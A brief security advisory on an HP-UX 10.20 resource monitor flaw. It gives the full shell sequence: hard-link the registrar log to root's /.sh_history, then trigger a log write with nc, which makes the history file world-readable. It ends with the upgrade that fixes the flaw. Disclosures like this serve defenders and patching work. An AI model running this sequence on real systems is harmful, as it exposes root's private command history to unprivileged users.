|
Vulnerability resource monitor Affected HpUX 10.20 Description J.A. Gutierrez found following. On HP-UX 10.20 you can change any file on the root partition to mode 644: $ uname -sr HP-UX B.10.20 $ cd /etc/opt/resmon/log $ mv registrar.log registrar.log.orig $ ls -l /.sh_history -rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history $ ln /.sh_history registrar.log $ nc hpux.example.com 1712 < /etc/motd $ ls -l /.sh_history -rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history $ rm -f registrar.log $ mv registrar.log.orig registrar.log So, /.sh_history becomes world readable, and text similar to Event 382 occurred at Wed Nov 8 09:45:28.818524 2000 Process ID: 10931 (/etc/opt/resmon/lbin/registrar) Log Level: Error _rm_recv: Couldn't malloc 1073803312 bytes for receive buffer gets appended to it. Solution Upgrade to EMS A.03.20 release.